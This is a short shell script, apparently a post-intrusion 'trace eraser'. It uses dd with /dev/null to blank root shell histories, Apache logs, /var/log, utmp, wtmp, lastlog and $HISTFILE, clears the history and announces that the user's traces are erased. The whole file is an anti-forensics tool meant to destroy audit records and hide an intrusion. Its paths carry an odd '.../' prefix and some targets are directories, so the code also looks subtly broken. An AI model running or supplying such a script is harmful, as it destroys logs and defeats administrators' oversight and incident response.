stty -echo
echo "\!/ TARGETING FILES \!/ "
dd if="/dev/null" of=".../tmp/logs"
echo "Deleted [+].../tmp/logs"
dd if="/dev/null" of=".../root/.bash_history"
echo "Deleted [+].../root/.bash_history"
dd if="/dev/null" of=".../root/.ksh_history"
echo "Deleted [+].../root/.ksh_history"
dd if="/dev/null" of=".../root/.bash_logout"
echo "Deleted [+].../root/.bash_logout"
dd if="/dev/null" of=".../usr/local/apache/logs"
echo "Deleted [+].../usr/local/apache/logs"
dd if="/dev/null" of=".../usr/local/apache/log"
echo "Deleted [+].../usr/local/apache/log"
dd if="/dev/null" of=".../var/apache/logs"
echo "Deleted [+].../var/apache/logs"
dd if="/dev/null" of=".../var/apache/log"
echo "Deleted [+].../var/apache/log"
dd if="/dev/null" of=".../var/run/utmp"
echo "Deleted [+].../var/run/utmp"
dd if="/dev/null" of=".../var/logs"
echo "Deleted [+].../var/logs"
dd if="/dev/null" of=".../var/log"
echo "Deleted [+].../var/log"
dd if="/dev/null" of=".../var/adm"
echo "Deleted [+].../var/adm"
dd if="/dev/null" of=".../etc/wtmp"
echo "Deleted [+].../etc/wtmp"
dd if="/dev/null" of=".../etc/utmp"
echo "Deleted [+].../etc/utmp"
dd if="/dev/null" of="...$HISTFILE"
echo "Deleted [+]...$HISTFILE"
dd if="/dev/null" of=".../var/log/lastlog"
echo "Deleted [+].../var/log/lastlog"
dd if="/dev/null" of=".../var/log/wtmp"
echo "Deleted [+].../var/log/wtmp"
history -c

echo ""
echo ".."
echo "...//"
echo "YOUR TRACES HAVE BEEN SUCCESSFULLY ERASED FROM THE SERVER! ─=≡Σ(/.__.)/"
stty echo
